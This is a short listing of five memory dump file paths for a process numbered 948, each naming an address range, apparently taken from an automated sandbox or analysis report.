memory/948-80-0x00007FFE7EB90000-0x00007FFE7EBA0000-memory.dmp

memory/948-81-0x00007FFE7EB90000-0x00007FFE7EBA0000-memory.dmp

memory/948-82-0x00007FFE7EB90000-0x00007FFE7EBA0000-memory.dmp

memory/948-79-0x00007FFE7EB90000-0x00007FFE7EBA0000-memory.dmp

memory/948-83-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp